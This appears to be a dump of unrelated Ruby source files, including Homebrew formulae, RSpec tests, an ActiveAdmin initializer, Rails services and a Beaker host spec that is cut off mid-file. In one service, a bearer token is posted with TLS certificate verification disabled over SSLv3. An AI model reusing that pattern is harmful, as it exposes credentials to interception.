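        #
        #   Page::Main::Menu.perform do |menu|
        #     menu.go_to_projects
        #   end
        #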
private
def within_top_menu
page.within('.qa-navbar') do
yield
end
end
def within_user_menu
within_top_menu do
click_element :user_avatar
page.within('.dropdown-menu') do
yield
end
end
end
end
end
end
end
| 25.816327 | 110 | 0.592885 |
7a45580c52a8dd227d2b02862087bb90ebec0e46 | 814 | cask 'sqlpro-studio' do
version '2020.39'
sha256 '8d578529ce7430ee8b81b75d7f9df094d5a6ca0d9ab18e0b06bc141141da9616'
# d3fwkemdw8spx3.cloudfront.net/studio/ was verified as official when first introduced to the cask
url "https://d3fwkemdw8spx3.cloudfront.net/studio/SQLProStudio.#{version}.app.zip"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?user_agent=Macintosh&url=https://www.sqlprostudio.com/download.php'
name 'SQLPro Studio'
homepage 'https://www.sqlprostudio.com/'
app 'SQLPro Studio.app'
zap trash: [
'~/Library/Containers/com.hankinsoft.osx.sqlprostudio',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.hankinsoft.osx.sqlprostudio.sfl*',
]
end
| 45.222222 | 163 | 0.756757 |
08a3629832adcbbf1ce10b1b08f9680eb73c5d36 | 2,755 | require 'spec_helper'
require 'docker'
require 'serverspec'
BOSH_CLI_VERSION="6.4.1-35ce8438-2020-10-20T16:04:13Z"
CREDHUB_VERSION='2.8.0'
BOSH_ENV_DEPS = "build-essential zlibc zlib1g-dev openssl libxslt1-dev libxml2-dev \
libssl-dev libreadline7 libreadline-dev libyaml-dev libsqlite3-dev sqlite3"
describe "bosh-cli-v2 image" do
before(:all) {
set :docker_image, find_image_id('bosh-cli-v2:latest')
}
it "installs required packages" do
BOSH_ENV_DEPS.split(' ').each do |package|
expect(package(package)).to be_installed
end
end
it "has the expected version of the Bosh CLI" do
expect(
command("bosh -v").stdout.strip
).to eq("version #{BOSH_CLI_VERSION}")
end
it "has `file` available" do
expect(
command("file --version").exit_status
).to eq(0)
end
it "has ssh available" do
expect(
command("ssh -V").exit_status
).to eq(0)
end
it "can run git" do
expect(command('git --version').exit_status).to eq(0)
end
it "can run credhub" do
cmd = command('credhub --version')
expect(cmd.exit_status).to eq(0)
expect(cmd.stdout.match?(/#{CREDHUB_VERSION}/)).to eq(true)
end
it "has `bash` available" do
expect(
command("bash --version").exit_status
).to eq(0)
end
it "has a new enough version of openssl available" do
# wget (from busybox) requires openssl to be able to connect to https sites.
# See https://github.com/nahi/httpclient/blob/v2.7.1/lib/httpclient/ssl_config.rb#L441-L452
# (httpclient is a dependency of bosh_cli)
# With an older version of openssl, bosh_cli spits out warnings.
cmd = command("openssl version")
expect(cmd.exit_status).to eq(0)
ssl_version_str = cmd.stdout.strip
if ssl_version_str.start_with?('OpenSSL 1.0.1')
expect(ssl_version_str).to be >= 'OpenSSL 1.0.1p'
else
expect(ssl_version_str).to be >= 'OpenSSL 1.0.2d'
end
end
it "has ruby 2.7 available" do
cmd = command("ruby -v")
expect(cmd.exit_status).to eq(0)
expect(cmd.stdout).to match(/^ruby 2.7/)
end
it "contains the compiled CPI packages" do
installation_path = '/root/.bosh/installations/44f01911-a47a-4a24-6ca3-a3109b33f058'
packages_file = file("#{installation_path}/compiled_packages.json")
expect(packages_file).to exist
compiled_packages = JSON.parse(packages_file.content)
compiled_packages.each do |package|
expect(file("#{installation_path}/blobs/#{package["Value"]["BlobID"]}")).to exist
end
cpi_package = compiled_packages.find {|p| p["Key"]["PackageName"] == "bosh_aws_cpi" }
expect(cpi_package).to be
expect(file("#{installation_path}/packages/bosh_aws_cpi/bin/aws_cpi")).to be_executable
end
end
| 29.308511 | 95 | 0.685662 |
ff91ec241c2b7395533313b24ed70487bebced03 | 1,170 | require 'thor/shell/basic'
module GenSpec
# Just like a Thor::Shell::Basic except that input and output are both redirected to
# the specified streams. By default, these are initialized to instances of StringIO.
class Shell < Thor::Shell::Basic
attr_accessor :stdin, :stdout, :stderr
alias_method :input, :stdin
alias_method :input=, :stdin=
alias_method :output, :stdout
alias_method :output=, :stdout=
def ask(statement, color = nil)
say "#{statement} ", color
response = stdin.gets
if response
response.strip
else
raise "Asked '#{statement}', but input.gets returned nil!"
end
end
def initialize(output = "", input = "")
super()
new(output, input)
end
# Reinitializes this Shell with the given input and output streams.
def new(output="", input="")
init_stream(:output, output)
init_stream(:input, input)
@stderr = @stdout
self
end
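    # Illustrative sketch (not part of the original source): script stdin for
    # a generator run and inspect the captured output afterwards, assuming
    # Thor's prompt helpers write to the overridden streams.
    #
    #   shell = GenSpec::Shell.new
    #   shell.input << "yes\n"
    #   shell.input.rewind
    #   shell.ask("Overwrite existing file?")  # => "yes"
    #   shell.output.string                    # everything printed so far
    #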
private
def init_stream(which, value)
if value.kind_of?(String)
value = StringIO.new(value)
end
send("#{which}=", value)
end
end
end | 26 | 86 | 0.619658 |
6adf22346f2aed5fbc33964be404cbaffe9ae641 | 6,477 | require "json"
require "net/http"
require "digest"
class PerformancePlatformService
TRANSACTIONS_BY_CHANNEL_URL = "https://www.performance.service.gov.uk/data/queens-awards-for-enterprise/transactions-by-channel"
APPLICATIONS_BY_STAGE_URL = "https://www.performance.service.gov.uk/data/queens-awards-for-enterprise/applications-by-stage"
AWARD_TYPE_MAPPING = {
"trade" => "international-trade",
"innovation" => "innovation",
"development" => "sustainable-development",
"promotion" => "qaep"
}
POSSIBLE_RANGES = [
"100-percent",
"75-99-percent",
"50-74-percent",
"25-49-percent",
"1-24-percent",
"0-percent"
]
def self.run
log_this("started") unless Rails.env.test?
perform_transactions_by_channel
perform_applications_by_stage
log_this("completed") unless Rails.env.test?
end
#[
# {
# "_id": "23456780",
# "_timestamp": "2015-03-10T00:00:00Z",
# "period": "week",
# "channel": "online",
# "channel_type": "digital",
# "count": 42
# }
#]
def self.perform_transactions_by_channel
timestamp = (Time.current - 1.week).beginning_of_day.utc
form_answers_count = form_answers_for_past_week.submitted.count
result = {
"period" => "week",
"channel" => "online",
"channel_type" => "digital",
"count" => form_answers_count,
"_timestamp" => timestamp.iso8601
}
result["_id"] = generate_transactions_id(result)
perform_request(TRANSACTIONS_BY_CHANNEL_URL, [result])
end
#[
# {
# "_id": "23456789",
# "_timestamp": "2015-03-18T00:00:00Z",
# "period": "week",
# "award": "qaep",
# "stage": "1-24-percent",
# "count": 23,
# "cumulative_count": 30
# },
# {
# "_id": "23456780",
# "_timestamp": "2015-03-10T00:00:00Z",
# "period": "week",
# "award": "qaep",
# "stage": "0-percent",
# "count": 42,
# "cumulative_count": 72
# }
#]
def self.perform_applications_by_stage
payload = fetch_applications_data
perform_request(APPLICATIONS_BY_STAGE_URL, payload)
end
def self.perform_request(url, payload)
if ENV["PERFORMANCE_PLATFORM_TOKEN"].present?
headers = {
"Content-Type" =>"application/json",
"Authorization" => "Bearer #{ENV['PERFORMANCE_PLATFORM_TOKEN']}"
}
uri = URI(url)
req = Net::HTTP::Post.new(uri.path, headers)
req.body = payload.to_json
res = Net::HTTP.start(uri.host, uri.port, use_ssl: true) do |http|
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
http.ssl_version = :SSLv3
http.request req
end
puts res.body
nil
end
end
def self.fetch_applications_data
result = []
timestamp = (Time.current - 1.week).beginning_of_day.utc
AWARD_TYPE_MAPPING.each do |award_type, award|
POSSIBLE_RANGES.each do |stage|
case stage
when "0-percent"
count = form_answers
.where("fill_progress IS NULL OR fill_progress = 0")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress IS NULL OR fill_progress >= 0 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "1-24-percent"
count = form_answers
.where("fill_progress > 0 AND fill_progress < 25")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress > 0 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "25-49-percent"
count = form_answers
.where("fill_progress >= 25 AND fill_progress < 50")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 25 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "50-74-percent"
count = form_answers
.where("fill_progress >= 50 AND fill_progress < 75")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 50 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "75-99-percent"
count = form_answers
.where("fill_progress >= 75 AND fill_progress < 100")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 50 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "100-percent"
count = form_answers
.where("fill_progress = 100 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
cumulative_count = count
end
data = {
"_timestamp" => timestamp.iso8601,
"period" => "week",
"award" => award,
"stage" => stage,
"count" => count,
"cumulative_count" => cumulative_count
}
data["_id"] = generate_applications_id(data)
result << data
end
end
result
end
# "A SHA256 encoded concatenation of: _timestamp, period, channel, channel_type, (the dimensions of the data point)"
def self.generate_transactions_id(data)
string = ""
%w(_timestamp period channel channel_type).each do |attr|
string << data[attr]
end
md5(string)
end
# "A SHA256 encoded concatenation of: _timestamp, period, award, stage, i.e. (the dimensions of the data point)"
def self.generate_applications_id(data)
string = ""
%w(_timestamp period award stage).each do |attr|
string << data[attr]
end
md5(string)
end
def self.form_answers_for_past_week
AwardYear.current.form_answers
.where("created_at >= ?", (Time.current - 1.week).beginning_of_day)
.where("created_at < ?", Time.current.beginning_of_day)
end
def self.form_answers
AwardYear.current.form_answers
end
def self.md5(string)
md5 = Digest::MD5.new
md5.update(string)
md5.hexdigest
end
class << self
def log_this(message)
p "[PerformancePlatformService] #{Time.zone.now} #{message}"
end
end
end
| 26.654321 | 130 | 0.599815 |
bb196690a3d19914531473d3b4863a6ba872da76 | 302 | require_relative "graphic/context"
module Vamp
module Graphic
end
end
if __FILE__ == $0
g = Vamp::Graphic::Context.new(Vamp::Graphic::TextDotter.new(80, 20))
g.dot(10, 10)
g.line 1, 2, 70, 9
g.draw 40, 10, 100, 1
puts g.screen
puts "now we get an error:"
g.line 1, 1, 100, 100
end
| 16.777778 | 71 | 0.652318 |
5d05b875397c6ac3c9cafe522001ebfeeffd178b | 1,637 | class Gmp < Formula
desc "GNU multiple precision arithmetic library"
homepage "https://gmplib.org/"
url "http://ftpmirror.gnu.org/gmp/gmp-6.0.0a.tar.bz2"
mirror "https://gmplib.org/download/gmp/gmp-6.0.0a.tar.bz2"
mirror "https://ftp.gnu.org/gnu/gmp/gmp-6.0.0a.tar.bz2"
sha256 "7f8e9a804b9c6d07164cf754207be838ece1219425d64e28cfa3e70d5c759aaf"
bottle do
cellar :any
sha256 "616e465ea6c792e41c9870071128a42ad3db0988f678c4a27b9aa4aa60071abb" => :el_capitan
sha1 "93ad3c1a012806518e9a128d6eb5b565b4a1771d" => :yosemite
sha1 "bfaab8c533af804d4317730f62164b9c80f84f24" => :mavericks
sha1 "99dc6539860a9a8d3eb1ac68d5b9434acfb2d846" => :mountain_lion
sha1 "466b7549553bf0e8f14ab018bd89c48cbd29a379" => :lion
sha1 "c07dc7381816102a65f8602dfb41c43d9382fbac" => :x86_64_linux
end
option "32-bit"
option :cxx11
def install
ENV.cxx11 if build.cxx11?
args = ["--prefix=#{prefix}", "--enable-cxx"]
if build.build_32_bit?
ENV.m32
args << "ABI=32"
end
# https://github.com/Homebrew/homebrew/issues/20693
args << "--disable-assembly" if build.build_32_bit? || build.bottle?
system "./configure", *args
system "make"
system "make", "check" unless OS.linux? # Fails without LD_LIBRARY_PATH
ENV.deparallelize
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <gmp.h>
int main()
{
mpz_t integ;
mpz_init (integ);
mpz_clear (integ);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lgmp", "-o", "test"
system "./test"
end
end
| 28.719298 | 92 | 0.673183 |
217fba53f804f6f201b64401e75bc0d2f7ba23dc | 567 | # frozen_string_literal: true
RSpec.describe CreateAccountInlineJob do
let(:account) { FactoryBot.create(:account) }
describe '#perform' do
it 'calls other jobs synchronously' do
expect(CreateSolrCollectionJob).to receive(:perform_now).with(account)
expect(CreateFcrepoEndpointJob).to receive(:perform_now).with(account)
expect(CreateRedisNamespaceJob).to receive(:perform_now).with(account)
expect(CreateDefaultAdminSetJob).not_to receive(:perform_now) # now in callback
described_class.perform_now(account)
end
end
end
| 35.4375 | 85 | 0.761905 |
263ae52cad043e03ca74695699ba2827fac16b0f | 161 | class MakePlaylistDescriptionsLonger < ActiveRecord::Migration
def self.up
change_column(:playlists, :description, :text)
end
def self.down
end
end
| 17.888889 | 62 | 0.757764 |
7ac893c480eb6bb991b16cb67c19a68abbaaa699 | 9,401 | ActiveAdmin.setup do |config|
# == Site Title
#
# Set the title that is displayed on the main layout
# for each of the active admin pages.
#
config.site_title = 'Wedding'
# Set the link url for the title. For example, to take
# users to your main site. Defaults to no link.
#
# config.site_title_link = "/"
# Set an optional image to be displayed for the header
# instead of a string (overrides :site_title)
#
# Note: Aim for an image that's 21px high so it fits in the header.
#
# config.site_title_image = "logo.png"
# == Default Namespace
#
# Set the default namespace each administration resource
# will be added to.
#
# eg:
# config.default_namespace = :hello_world
#
# This will create resources in the HelloWorld module and
# will namespace routes to /hello_world/*
#
# To set no namespace by default, use:
# config.default_namespace = false
#
# Default:
# config.default_namespace = :admin
#
# You can customize the settings for each namespace by using
# a namespace block. For example, to change the site title
# within a namespace:
#
# config.namespace :admin do |admin|
# admin.site_title = "Custom Admin Title"
# end
#
# This will ONLY change the title for the admin section. Other
# namespaces will continue to use the main "site_title" configuration.
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the application controller.
config.authentication_method = :authenticate_admin_user!
# == User Authorization
#
# Active Admin will automatically call an authorization
# method in a before filter of all controller actions to
# ensure that there is a user with proper rights. You can use
# CanCanAdapter or make your own. Please refer to documentation.
# config.authorization_adapter = ActiveAdmin::CanCanAdapter
# In case you prefer Pundit over other solutions you can here pass
# the name of default policy class. This policy will be used in every
# case when Pundit is unable to find suitable policy.
# config.pundit_default_policy = "MyDefaultPunditPolicy"
# You can customize your CanCan Ability class name here.
# config.cancan_ability_class = "Ability"
# You can specify a method to be called on unauthorized access.
# This is necessary in order to prevent a redirect loop which happens
# because, by default, user gets redirected to Dashboard. If user
# doesn't have access to Dashboard, he'll end up in a redirect loop.
# Method provided here should be defined in application_controller.rb.
# config.on_unauthorized_access = :access_denied
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# (within the application controller) to return the currently logged in user.
config.current_user_method = :current_admin_user
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_user_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc..
#
# Default:
# config.logout_link_method = :get
# == Root
#
# Set the action to call for the root path. You can set different
# roots for each namespace.
#
# Default:
# config.root_to = 'dashboard#index'
# == Admin Comments
#
# This allows your users to comment on any resource registered with Active Admin.
#
# You can completely disable comments:
# config.comments = false
#
# You can change the name under which comments are registered:
# config.comments_registration_name = 'AdminComment'
#
# You can change the order for the comments and you can change the column
# to be used for ordering:
# config.comments_order = 'created_at ASC'
#
# You can disable the menu item for the comments index page:
# config.comments_menu = false
#
# You can customize the comment menu:
# config.comments_menu = { parent: 'Admin', priority: 1 }
# == Batch Actions
#
# Enable and disable Batch Actions
#
config.batch_actions = true
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources and pages from here.
#
# config.before_action :do_something_awesome
# == Localize Date/Time Format
#
# Set the localize format to display dates and times.
# To understand how to localize your app with I18n, read more at
# https://github.com/svenfuchs/i18n/blob/master/lib%2Fi18n%2Fbackend%2Fbase.rb#L52
#
config.localize_format = :long
# == Setting a Favicon
#
# config.favicon = 'favicon.ico'
# == Meta Tags
#
# Add additional meta tags to the head element of active admin pages.
#
# Add tags to all pages logged in users see:
# config.meta_tags = { author: 'My Company' }
# By default, sign up/sign in/recover password pages are excluded
# from showing up in search engine results by adding a robots meta
# tag. You can reset the hash of meta tags included in logged out
# pages:
# config.meta_tags_for_logged_out_pages = {}
# == Removing Breadcrumbs
#
# Breadcrumbs are enabled by default. You can customize them for individual
# resources or you can disable them globally from here.
#
# config.breadcrumb = false
# == Create Another Checkbox
#
# Create another checkbox is disabled by default. You can customize it for individual
# resources or you can enable them globally from here.
#
# config.create_another = true
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
# config.register_stylesheet 'my_stylesheet.css'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', media: :print
#
# To load a javascript file:
# config.register_javascript 'my_javascript.js'
# == CSV options
#
# Set the CSV builder separator
# config.csv_options = { col_sep: ';' }
#
# Force the use of quotes
# config.csv_options = { force_quotes: true }
# == Menu System
#
# You can add a navigation menu to be used in your application, or configure a provided menu
#
# To change the default utility navigation to show a link to your website & a logout btn
#
# config.namespace :admin do |admin|
# admin.build_menu :utility_navigation do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# admin.add_logout_button_to_menu menu
# end
# end
#
# If you wanted to add a static menu item to the default menu provided:
#
# config.namespace :admin do |admin|
# admin.build_menu :default do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# end
# end
# == Download Links
#
# You can disable download links on resource listing pages,
# or customize the formats shown per namespace/globally
#
# To disable/customize for the :admin namespace:
#
# config.namespace :admin do |admin|
#
# # Disable the links entirely
# admin.download_links = false
#
# # Only show XML & PDF options
# admin.download_links = [:xml, :pdf]
#
# # Enable/disable the links based on block
# # (for example, with cancan)
# admin.download_links = proc { can?(:view_download_links) }
#
# end
# == Pagination
#
# Pagination is enabled by default for all resources.
# You can control the default per page count for all resources here.
#
# config.default_per_page = 30
#
# You can control the max per page count too.
#
# config.max_per_page = 10_000
# == Filters
#
# By default the index screen includes a "Filters" sidebar on the right
# hand side with a filter for each attribute of the registered model.
# You can enable or disable them for all resources here.
#
# config.filters = true
#
# By default the filters include associations in a select, which means
# that every record will be loaded for each association.
# You can enabled or disable the inclusion
# of those filters by default here.
#
# config.include_default_association_filters = true
# == Footer
#
# By default, the footer shows the current Active Admin version. You can
# override the content of the footer here.
#
# config.footer = 'my custom footer text'
# == Sorting
#
# By default ActiveAdmin::OrderClause is used for sorting logic
# You can inherit it with own class and inject it for all resources
#
# config.order_clause = MyOrderClause
end
| 31.97619 | 116 | 0.701627 |
08f13d68770fd2ba3afc4fc9423f2d0913a5f945 | 3,836 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::NetApp::Mgmt::V2019_11_01
module Models
#
# NetApp account patch resource
#
class NetAppAccountPatch
include MsRestAzure
# @return [String] Resource location
attr_accessor :location
# @return [String] Resource Id
attr_accessor :id
# @return [String] Resource name
attr_accessor :name
# @return [String] Resource type
attr_accessor :type
# @return [Hash{String => String}] Resource tags
attr_accessor :tags
# @return [String] Azure lifecycle management
attr_accessor :provisioning_state
# @return [Array<ActiveDirectory>] Active Directories
attr_accessor :active_directories
#
# Mapper for NetAppAccountPatch class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'netAppAccountPatch',
type: {
name: 'Composite',
class_name: 'NetAppAccountPatch',
model_properties: {
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
active_directories: {
client_side_validation: true,
required: false,
serialized_name: 'properties.activeDirectories',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ActiveDirectoryElementType',
type: {
name: 'Composite',
class_name: 'ActiveDirectory'
}
}
}
}
}
}
}
end
end
end
end
| 28.842105 | 70 | 0.447341 |
2144ad3871b97d111c37c7ebdcd597348f3e59b3 | 2,337 | class Readline < Formula
desc "Library for command-line editing"
homepage "https://tiswww.case.edu/php/chet/readline/rltop.html"
url "https://ftp.gnu.org/gnu/readline/readline-8.0.tar.gz"
mirror "https://ftpmirror.gnu.org/readline/readline-8.0.tar.gz"
version "8.0.4"
sha256 "e339f51971478d369f8a053a330a190781acb9864cf4c541060f12078948e461"
%w[
001 d8e5e98933cf5756f862243c0601cb69d3667bb33f2c7b751fe4e40b2c3fd069
002 36b0febff1e560091ae7476026921f31b6d1dd4c918dcb7b741aa2dad1aec8f7
003 94ddb2210b71eb5389c7756865d60e343666dfb722c85892f8226b26bb3eeaef
004 b1aa3d2a40eee2dea9708229740742e649c32bb8db13535ea78f8ac15377394c
].each_slice(2) do |p, checksum|
patch :p0 do
url "https://ftp.gnu.org/gnu/readline/readline-8.0-patches/readline80-#{p}"
mirror "https://ftpmirror.gnu.org/readline/readline-8.0-patches/readline80-#{p}"
sha256 checksum
end
end
bottle do
cellar :any
sha256 "6ae1c8e7c783f32bd22c6085caa4d838fed7fb386da7e40ca47b87ec9b1237d6" => :catalina
sha256 "29f7102a730ab39c8312cad1e7e439f6da2a67c452ce2b3380581eb185a5d8e8" => :mojave
sha256 "896a3d50ce8962ba56e853bdd590fadeabc00ab36475d143d6c2bea5cc15bb28" => :high_sierra
sha256 "46da47db3da04b2f248e3cf2d6d14c55aa543555d1134f6cbbf07787a5bf0bd6" => :x86_64_linux
end
uses_from_macos "ncurses"
keg_only :shadowed_by_macos, "macOS provides BSD libedit"
uses_from_macos "ncurses"
def install
system "./configure", "--prefix=#{prefix}",
("--with-curses" unless OS.mac?)
args = []
args << "SHLIB_LIBS=-lcurses" unless OS.mac?
# There is no termcap.pc in the base system, so we have to comment out
# the corresponding Requires.private line.
# Otherwise, pkg-config will consider the readline module unusable.
inreplace "readline.pc", /^(Requires.private: .*)$/, "# \\1"
system "make", "install", *args
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include <stdlib.h>
#include <readline/readline.h>
int main()
{
printf("%s\\n", readline("test> "));
return 0;
}
EOS
system ENV.cc, "-L", lib, "test.c", "-L#{lib}", "-lreadline", "-o", "test"
assert_equal "test> Hello, World!\nHello, World!",
pipe_output("./test", "Hello, World!\n").strip
end
end
| 35.953846 | 94 | 0.712024 |
614cda5bde97f2b7d90fef481b48921622f414d9 | 1,754 | require 'rails_helper'
describe ScenarioImportsController do
let(:user) { users(:bob) }
before do
login_as(user)
end
it 'renders the import form' do
visit new_scenario_imports_path
expect(page).to have_text('Import a Public Scenario')
end
  it 'requires a URL or file upload' do
visit new_scenario_imports_path
click_on 'Start Import'
expect(page).to have_text('Please provide either a Scenario JSON File or a Public Scenario URL.')
end
it 'imports a scenario that does not exist yet' do
visit new_scenario_imports_path
attach_file('Option 2: Upload a Scenario JSON File', File.join(Rails.root, 'data/default_scenario.json'))
click_on 'Start Import'
expect(page).to have_text('This scenario has a few agents to get you started. Feel free to change them or delete them as you see fit!')
expect(page).not_to have_text('This Scenario already exists in your system.')
check('I confirm that I want to import these Agents.')
click_on 'Finish Import'
expect(page).to have_text('Import successful!')
end
it 'asks to accept conflicts when the scenario was modified' do
DefaultScenarioImporter.seed(user)
agent = user.agents.where(name: 'Rain Notifier').first
agent.options['expected_receive_period_in_days'] = 9001
agent.save!
visit new_scenario_imports_path
attach_file('Option 2: Upload a Scenario JSON File', File.join(Rails.root, 'data/default_scenario.json'))
click_on 'Start Import'
expect(page).to have_text('This Scenario already exists in your system.')
expect(page).to have_text('9001')
check('I confirm that I want to import these Agents.')
click_on 'Finish Import'
expect(page).to have_text('Import successful!')
end
end
| 37.319149 | 139 | 0.730901 |
01891b5a65b80bb4df8419f66e0d1906d7d1aab9 | 206 | class RenameSearchQueryToStr < ActiveRecord::Migration[4.2]
def self.up
change_column :search_searches, :query, :text
rename_column :search_searches, :query, :str
end
def self.down
end
end
| 20.6 | 59 | 0.737864 |
3371f348de0661270db356c3754af137325c6547 | 558 | module VacancyScraper::NorthEastSchools
class Processor
attr_accessor :listing
def initialize
@listing = ListManager.new
end
def self.execute!
vacancies = Processor.new.listing
next_page = true
while next_page
vacancies.search_results.each do |url|
Rails.logger.info("Scraping #{url}")
Scraper.new(url).map!
end
next_page = vacancies.next_page
vacancies = next_page.present? ? ListManager.new(vacancies.next_page) : next_page = false
end
end
end
end
| 24.26087 | 97 | 0.650538 |
ff2f224abd65ccccb5e57756fa83358d497dcbde | 1,173 | Gem::Specification.new do |s|
s.name = 'logstash-mixin-aws'
s.version = '4.3.0'
s.licenses = ['Apache License (2.0)']
s.summary = "AWS mixins to provide a unified interface for Amazon Webservice"
s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
s.authors = ["Elastic"]
s.email = '[email protected]'
s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
s.require_paths = ["lib"]
# Files
s.files = Dir['lib/**/*','spec/**/*','vendor/**/*','*.gemspec','*.md','CONTRIBUTORS','Gemfile','LICENSE','NOTICE.TXT']
# Tests
s.test_files = s.files.grep(%r{^(test|spec|features)/})
# Gem dependencies
s.add_runtime_dependency "logstash-core-plugin-api", ">= 1.60", "<= 2.99"
s.add_runtime_dependency 'logstash-codec-plain'
s.add_runtime_dependency 'aws-sdk-v1', '>= 1.61.0'
s.add_runtime_dependency 'aws-sdk', '~> 2'
s.add_development_dependency 'logstash-devutils'
s.add_development_dependency 'timecop'
end
| 43.444444 | 205 | 0.658142 |
e9585fc58a4d5604c4b4361ce0fde6c3c1212aee | 596 | #! /usr/bin/env ruby -S rspec
require 'spec_helper_acceptance'
describe 'localrepos' do
it 'should have packages cached' do
shell('yum --disablerepo="*" --enablerepo="base_local" list available') do |cmd|
cmd.stdout.should =~ /irssi/
cmd.exit_code.should == 0
end
shell('yum --disablerepo="*" --enablerepo="epel_local" list available') do |cmd|
cmd.stdout.should =~ /rubygem-sinatra/
cmd.exit_code.should == 0
end
shell('yum --disablerepo="*" --enablerepo="updates_local" list available') do |cmd|
cmd.exit_code.should == 0
end
end
end
| 29.8 | 87 | 0.65604 |
0850192910e9226ee35443f760e836727037a675 | 34,554 | require 'spec_helper'
module Beaker
describe Host do
let(:options) { @options ? @options : {} }
let(:platform) { @platform ? { :platform => @platform } : {} }
let(:host) { make_host( 'name', options.merge(platform) ) }
it 'creates a windows host given a windows config' do
@platform = 'windows'
expect( host ).to be_a_kind_of Windows::Host
end
it 'defaults to a unix host' do
expect( host ).to be_a_kind_of Unix::Host
end
it 'can be read like a hash' do
expect{ host['value'] }.to_not raise_error
end
it 'can be written like a hash' do
host['value'] = 'blarg'
expect( host['value'] ).to be === 'blarg'
end
describe "host types" do
let(:options) { Beaker::Options::OptionsHash.new }
it "can be a pe host" do
options['type'] = 'pe'
expect(host.is_pe?).to be_truthy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_truthy
expect(host.graceful_restarts?).to be_falsy
end
it "can be a foss-source host" do
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_falsy
expect(host.is_using_passenger?).to be_falsy
end
it "can be a foss-package host" do
options['use-service'] = true
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_falsy
expect(host.graceful_restarts?).to be_falsy
end
it "can be a foss-packaged host using passenger" do
host.uses_passenger!
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_truthy
expect(host.graceful_restarts?).to be_truthy
end
it 'can be an AIO host' do
options['type'] = 'aio'
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_falsy
expect(host.is_using_passenger?).to be_falsy
end
it 'sets the paths correctly for an AIO host' do
options['type'] = 'aio'
expect(host['puppetvardir']).to be_nil
end
end
describe "uses_passenger!" do
it "sets passenger property" do
host.uses_passenger!
expect(host['passenger']).to be_truthy
expect(host.is_using_passenger?).to be_truthy
end
it "sets puppetservice" do
host.uses_passenger!('servicescript')
expect(host['puppetservice']).to eq('servicescript')
end
it "sets puppetservice to apache2 by default" do
host.uses_passenger!
expect(host['puppetservice']).to eq('apache2')
end
end
describe "graceful_restarts?" do
it "is true if graceful-restarts property is set true" do
options['graceful-restarts'] = true
expect(host.graceful_restarts?).to be_truthy
end
it "is false if graceful-restarts property is set false" do
options['graceful-restarts'] = false
expect(host.graceful_restarts?).to be_falsy
end
it "is false if is_pe and graceful-restarts is nil" do
options['type'] = 'pe'
expect(host.graceful_restarts?).to be_falsy
end
it "is true if is_pe and graceful-restarts is true" do
options['type'] = 'pe'
options['graceful-restarts'] = true
expect(host.graceful_restarts?).to be_truthy
end
it "falls back to passenger property if not pe and graceful-restarts is nil" do
host.uses_passenger!
expect(host.graceful_restarts?).to be_truthy
end
